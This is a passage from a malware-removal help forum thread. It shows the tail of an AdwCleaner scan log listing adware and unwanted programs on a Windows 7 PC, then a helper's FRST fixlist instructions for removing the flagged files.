Key Found : HKU\.DEFAULT\Software\AppDataLow\Software\Object Browser
Key Found : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\iWebar
Key Found : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Object Browser
Key Found : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\video MediaPlay-Air
Key Found : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\_CrossriderRegNamePlaceHolder_
Key Found : HKU\S-1-5-19\Software\Browser
Key Found : HKU\S-1-5-19\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKU\S-1-5-20\Software\Browser
Key Found : HKU\S-1-5-20\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKLM\SOFTWARE\Classes\Installer\Features\A5900AE28AD765042A181FC92923C540
Key Found : HKLM\SOFTWARE\Classes\Installer\Products\A5900AE28AD765042A181FC92923C540
Key Found : HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\30C16B15B255BD349A1157B8A83E2AF9
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ED1CAE30F47D14B41B5FC8FA53658044
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A5900AE28AD765042A181FC92923C540
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{4C4C7AAB-5854-4241-A414-E2F1EF119C4A}
Key Found : HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\{4C4C7AAB-5854-4241-A414-E2F1EF119C4A}
 
***** [ Web browsers ] *****
 
[C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Found : aol.com
[C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Found : ask.com
[C:\Users\Nexus Media Server\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Found : mhkaekfpcppmmioggniknbnbdbcigpkk
 
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [31365 bytes] ##########
# AdwCleaner v5.030 - Logfile created 01/01/2016 at 04:12:46
# Updated 17/01/2016 by Xplode
# Database : 2016-01-17.3 [Server]
# Operating system : Windows 7 Ultimate Service Pack 1 (x64)
# Username : Nexus Media Server - NEXUS_MEDIA_SVR
# Running from : C:\Users\Nexus Media Server\Downloads\adwcleaner_5.030.exe
# Option : Scan
 
***** [ Services ] *****
 
Service Found : BrsHelper
Service Found : sbmntr
Service Found : netmon_wfp
Service Found : Program Manager
 
***** [ Folders ] *****
 
Folder Found : C:\Program Files (x86)\DnsBasic
Folder Found : C:\Program Files (x86)\DriverToolkit
Folder Found : C:\Program Files (x86)\eSupport.com
Folder Found : C:\Program Files (x86)\Itibiti Soft Phone
Folder Found : C:\Program Files (x86)\PepperZip
Folder Found : C:\Program Files (x86)\VideoPerformer
Folder Found : C:\Program Files (x86)\YTDownloader
Folder Found : C:\Program Files (x86)\Mozilla Firefox\Extensions\{650EED71-89E2-453B-8DCF-2AA1B4AE6EF3}
Folder Found : C:\Program Files (x86)\Common Files\ProgramManager
Folder Found : C:\ProgramData\Conduit
Folder Found : C:\ProgramData\EEnjouyCCoupon
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverToolkit
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eSupport.com
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PepperZip
Folder Found : C:\Users\Nexus Media Server\AppData\Local\BrowserHelper
Folder Found : C:\Users\Nexus Media Server\AppData\LocalLow\Conduit
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games Bot
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoPerformer
Folder Found : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader
Folder Found : C:\Windows\Microsoft\sogrMed
Folder Found : C:\Windows\SysNative\Tasks\Astromenda
Folder Found : C:\Windows\SysNative\Tasks\YTDownloader
 
***** [ Files ] *****
 
File Found : C:\Program Files (x86)\Mozilla Firefox\my.cfg
File Found : C:\Program Files\Common Files\System\SysMenu.dll
File Found : C:\Program Files\Common Files\System\SysMenu64.dll
File Found : C:\Users\LogMeInRemoteUser\Desktop\PepperZip.lnk
File Found : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Knctr.lnk
File Found : C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bm.lnk
File Found : C:\Users\Nexus Media Server\AppData\Roaming\Mozilla\Firefox\Profiles\97kh77sy.default\invalidprefs.js
File Found : C:\Users\Nexus Media Server\Desktop\Continue VuuPC Installation.lnk
File Found : C:\Users\Nexus Media Server\Desktop\Find Drivers with DriverAgent.lnk
File Found : C:\Users\Nexus Media Server\Desktop\PepperZip.lnk
File Found : C:\Users\Nexus Media Server\Desktop\SpeedAnalysis.lnk
File Found : C:\Users\Nexus Media Server\Desktop\Sync Folder.lnk
File Found : C:\Users\Nexus Media Server\Desktop\YTDownloader.lnk
File Found : C:\Users\Nexus Media Server\Desktop\Continue GamesDesktop Uninstaller.lnk
File Found : C:\Users\Nexus Media Server\Desktop\Continue Games Desktop.lnk
File Found : C:\Users\Public\Desktop\Knctr.lnk
File Found : C:\Windows\SysNative\ImhxxpComm.dll
File Found : C:\Windows\SysNative\drivers\netmon_wfp.sys
 
***** [ DLL ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
Task Found : LaunchApp
Task Found : YTDownloader
Task Found : YTDownloaderUpd
Task Found : web_disco_notification_service
Task Found : Microsoft\Windows\Multimedia\SMupdate3
Task Found : Microsoft\Windows\Maintenance\SMupdate2
Task Found : GoogleUpdateTaskUserM_1_7_22_478699874-4155726479-3780505679-3006UA__333630343534353131342d235b783432415b45345a2d6c
 
***** [ Registry ] *****
 
Value Found : HKLM\SOFTWARE\Classes\.htm\OpenWithProgIDs [BrowserHTM]
Value Found : HKLM\SOFTWARE\Classes\.html\OpenWithProgIDs [BrowserHTM]
Value Found : HKLM\SOFTWARE\Classes\.shtml\OpenWithProgIDs [BrowserHTM]
Value Found : HKLM\SOFTWARE\Classes\.webp\OpenWithProgIDs [BrowserHTM]
Value Found : HKLM\SOFTWARE\Classes\.xht\OpenWithProgIDs [BrowserHTM]
Key Found : HKLM\SOFTWARE\Classes\AppID\SysMenu.DLL
Key Found : HKLM\SOFTWARE\Classes\CLSID\ForeceRemove
Key Found : HKLM\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\MPCBContextMenu
Key Found : HKLM\SOFTWARE\Classes\Record\{37AC0F3B-749F-3B22-811B-5A019EED2E85}
Key Found : HKLM\SOFTWARE\Classes\Record\{66DF7821-ED6D-3534-893C-0E89E74B0F91}
Key Found : HKLM\SOFTWARE\Classes\Record\{755CAFCC-F016-3B06-8F22-945EAA3AD10D}
Key Found : HKLM\SOFTWARE\Classes\Record\{903F9872-E87F-3B74-83B0-DBE10073B29D}
Key Found : HKLM\SOFTWARE\Classes\Record\{4392A6CC-7940-310E-8E16-799A8D93A438}
Key Found : HKLM\SOFTWARE\Classes\Record\{05660A04-00F1-3A04-AB3B-BC1074B84D67}
Key Found : HKLM\SOFTWARE\Classes\Record\{9558EEB4-CDA6-3778-B53B-98076F0A1E90}
Key Found : HKLM\SOFTWARE\Classes\Record\{76552F88-640C-314D-82B6-0D8A740907F7}
Key Found : HKLM\SOFTWARE\Classes\Record\{B25AA9BA-FD52-3E5E-BFE3-9B106779DA6E}
Key Found : HKLM\SOFTWARE\Classes\Record\{C852CF9F-37DC-35AC-926A-7E6CFFF7C501}
Key Found : HKLM\SOFTWARE\Classes\Record\{C9777796-4378-3C90-B52D-7238FFFC2A5C}
Key Found : HKLM\SOFTWARE\Classes\Record\{DB1BC8B2-FDBF-30E7-BE1C-AFF9160059E6}
Key Found : HKLM\SOFTWARE\Classes\Record\{F3D5729C-7DEB-3850-A026-D0E323ECFEF5}
Key Found : HKLM\SOFTWARE\Classes\Record\{FEC70973-CB8B-351C-8047-CAE1274CE249}
Key Found : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\browser.exe
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PepperZip.exe
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\VideoPerformer.exe
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\YTDownloader.exe
Key Found : HKLM\System\CurrentControlSet\Services\Eventlog\Application\Update Hatchiho
Key Found : HKLM\System\CurrentControlSet\Services\Eventlog\Application\Util Hatchiho
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [Plus-HD-1.2-bg.exe]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [Object Browser-bg.exe]
Value Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [iWebar-bg.exe]
Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKLM\SOFTWARE\5f558f8db334ea14
Key Found : HKLM\SOFTWARE\74ed1f33-1353-c366-d984-ccbd88bb8dd2
Key Found : HKLM\SOFTWARE\Classes\AppID\{FCF8BFD3-39B8-4370-B464-EC2AAACD97CF}
Key Found : HKLM\SOFTWARE\Classes\AppID\{9CB2CD61-FFA0-406C-9D2D-8FDE6F4A4D8A}
Key Found : HKLM\SOFTWARE\Classes\AppID\{D813D5BB-EBC7-45F9-B8A4-36A305168069}
Key Found : HKCU\Software\Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}
Key Found : HKCU\Software\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
Key Found : HKCU\Software\Classes\CLSID\{E4B02201-EA08-35F8-DE8D-19BB02BBFA9D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{3070CF0C-F396-3DCA-87D6-9DBF3D77B610}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{4529EB14-6B38-3CC4-9504-6EAB6C9E1255}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{BEEA930F-CD8A-341E-B6B5-5BAF659685D5}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{F03955F1-309E-34E9-A021-1399C3532273}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{2097A1B6-E86A-4072-A32D-2249A3ECBC5A}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{D879A501-50A7-BEFC-A4C5-32DC6E0CB208}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{B33BD6CF-BF4C-4CF0-AC84-B2974BC14ABD}
Key Found : HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
Key Found : HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
Key Found : HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
Key Found : HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
Key Found : HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
Key Found : HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
Key Found : HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
Key Found : HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
Key Found : HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
Key Found : HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
Key Found : HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
Key Found : HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
Key Found : HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
Key Found : HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
Key Found : HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
Key Found : HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
Key Found : HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
Key Found : HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
Key Found : HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
Key Found : HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
Key Found : HKLM\SOFTWARE\Classes\Interface\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{A0EE0278-2986-4E5A-884E-A3BF0357E476}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{9AE7A6AE-162E-44C4-9A2B-A6B4EF19909D}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{4723AAA8-B2F9-4CC1-9E60-190976DB1FA4}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4723AAA8-B2F9-4CC1-9E60-190976DB1FA4}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35B-6118-11DC-9C72-001320C79847}]
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{EEE6C35C-6118-11DC-9C72-001320C79847}]
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{EEE6C367-6118-11DC-9C72-001320C79847}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{17a1668a-3eeb-437f-8b25-9d7206eae93d}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{253d390a-8412-4b6d-86d4-e3cac4fdd5ca}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{020B1D4B-5738-4C77-9E19-4F173DD9B486}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{3070CF0C-F396-3DCA-87D6-9DBF3D77B610}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{4529EB14-6B38-3CC4-9504-6EAB6C9E1255}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{BEEA930F-CD8A-341E-B6B5-5BAF659685D5}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{F03955F1-309E-34E9-A021-1399C3532273}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{2097A1B6-E86A-4072-A32D-2249A3ECBC5A}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{00000000-BA82-4612-BE43-95B8B482C269}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{B33BD6CF-BF4C-4CF0-AC84-B2974BC14ABD}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E4C3E50F-5761-4BF8-95A0-939A819DF1C3}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{17a1668a-3eeb-437f-8b25-9d7206eae93d}
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{253d390a-8412-4b6d-86d4-e3cac4fdd5ca}
Key Found : HKCU\Software\Browser
Key Found : HKCU\Software\Conduit
Key Found : HKCU\Software\DriverToolkit
Key Found : HKCU\Software\eSupport.com
Key Found : HKCU\Software\GlobalUpdate
Key Found : HKCU\Software\IM
Key Found : HKCU\Software\InstalledBrowserExtensions
Key Found : HKCU\Software\MPC
Key Found : HKCU\Software\OffersWizard
Key Found : HKCU\Software\PepperZip
Key Found : HKCU\Software\performersoft llc
Key Found : HKCU\Software\SoftwareUpdater
Key Found : HKCU\Software\subpar
Key Found : HKCU\Software\tuguu sl
Key Found : HKCU\Software\Tutorials
Key Found : HKCU\Software\WNLT
Key Found : HKCU\Software\YTDownloader
Key Found : HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKCU\Software\AppDataLow\Software\BackgroundContainer
Key Found : HKCU\Software\AppDataLow\Software\BackgroundContainerV2
Key Found : HKCU\Software\AppDataLow\Software\Conduit
Key Found : HKCU\Software\AppDataLow\Software\Object Browser
Key Found : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
Key Found : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
Key Found : HKLM\SOFTWARE\Boost
Key Found : HKLM\SOFTWARE\Conduit
Key Found : HKLM\SOFTWARE\DnsBasic
Key Found : HKLM\SOFTWARE\GlobalUpdate
Key Found : HKLM\SOFTWARE\IGS
Key Found : HKLM\SOFTWARE\InstalledBrowserExtensions
Key Found : HKLM\SOFTWARE\SearchModule
Key Found : HKLM\SOFTWARE\Universal
Key Found : HKLM\SOFTWARE\VideoPlayerV3
Key Found : HKLM\SOFTWARE\YTDownloader
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{194FED75-9C74-BDB7-53F8-8CFFEF1AFEC9}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2D471A31-4FA7-95BA-1880-D441113ED736}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2DF3E224-05CD-4113-AA7A-86F2F6607B46}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{532970A2-464B-73CB-BBC4-F209EAD3EEBE}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{55d4b236-fe79-4782-cc2d-55acaf147087}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F488658-35A7-2AB8-A756-560BA8F103C3}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{70BD2558-27DA-8B02-02D0-D8704ECD2EDF}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{779D1843-0043-65D2-D781-8614F17B6222}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7E7FAE3D-3358-D280-8DBF-E8E2D94326D1}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{80E8B0A0-117D-1402-7CDE-688156237115}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9D9BEFAE-9499-F52B-6CC4-94818CCC2AB5}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A3FC46A0-9B62-0EF3-B475-743B3A2762B1}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B10BC31B-DBC6-56FE-DD3D-DD4E49A3E6CE}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B6D700D3-3D0D-FEEB-D675-2CE78F9EC5D6}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BE360B8B-0F10-CA89-FC84-A5EAB71A6AF8}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C60D3D4E-3B20-5AB3-7F2C-9C946AD4080F}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CA8C94BE-9F47-1B2E-90F8-D8C07119BD96}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D66BF89F-B0A2-48F5-A2E4-242EB645AB76}_is1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D831E399-50FE-84AE-F5F7-0A63AC282464}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F1422DAA-0829-09A1-7536-73936CAB8FFA}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{FE139F4C-CE5B-121A-8A2D-191FA2226094}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DnsBasic
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverAgent_is1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\igsc
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PepperZip
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VideoPerformer
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader
Key Found : [x64] HKLM\SOFTWARE\InstalledBrowserExtensions
Key Found : [x64] HKLM\SOFTWARE\SearchModule
Key Found : [x64] HKLM\SOFTWARE\Tarma Installer
Key Found : [x64] HKLM\SOFTWARE\WebBar
Key Found : [x64] HKLM\SOFTWARE\YTDownloader
Key Found : HKU\.DEFAULT\Software\Browser
Key Found : HKU\.DEFAULT\Software\IBUpdaterService
Key Found : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Found : HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKU\.DEFAULT\Software\AppDataLow\Software\Object Browser
Key Found : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\_CrossriderRegNamePlaceHolder_
Key Found : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\iWebar
Key Found : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Object Browser
Key Found : HKU\.DEFAULT\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\video MediaPlay-Air
Key Found : HKU\S-1-5-19\Software\Browser
Key Found : HKU\S-1-5-19\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKU\S-1-5-20\Software\Browser
Key Found : HKU\S-1-5-20\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKLM\SOFTWARE\Classes\Installer\Features\A5900AE28AD765042A181FC92923C540
Key Found : HKLM\SOFTWARE\Classes\Installer\Products\A5900AE28AD765042A181FC92923C540
Key Found : HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\30C16B15B255BD349A1157B8A83E2AF9
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ED1CAE30F47D14B41B5FC8FA53658044
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A5900AE28AD765042A181FC92923C540
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\A97CEC23332751B47BA4B95BAA50C9D0
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Itibiti.exe]
Value Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Run [YTDownloader]
Value Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [mobilegeni daemon]
Key Found : HKCU\Software\Classes\PepperZip
Key Found : HKLM\SOFTWARE\Classes\AniGIFCtrl.AniGIF
Key Found : HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg
Key Found : HKLM\SOFTWARE\Classes\AniGIFPpg.AniGIFPpg.1
Key Found : HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2
Key Found : HKLM\SOFTWARE\Classes\AniGIFPpg2.AniGIFPpg2.1
Key Found : HKLM\SOFTWARE\Classes\BrowserHTM
 
***** [ Web browsers ] *****
 
 
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [52106 bytes] ##########


#11 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:06:18 AM

Posted 18 January 2016 - 04:28 PM

The user can re-install later, whatever he wants...

---


Hello,
 

***


Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
Save it in the same location as / FSRT / FSRT64 (usually your desktop) as fixlist.txt
 
start
CreateRestorePoint:
EmptyTemp:
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\my-prefs.js [2015-03-25] <==== ATTENTION (Points to *.cfg file) 
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\my.cfg [2015-03-25] <==== ATTENTION
C:\Users\Nexus Media Server\AppData\Local\Temp\10862.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\14750.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\19124.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\19388.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\6330.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\71569_updater.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\72893_updater.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\CitrixOnlineLauncher.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\InstallUtil.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\of3w9136.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\Setup_132952.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\ShopperProJSINJFull.exe 
C:\Users\Nexus Media Server\AppData\Local\Temp\SpOrder.dll 
C:\Users\Nexus Media Server\AppData\Local\Temp\tmpddewfv.dll 
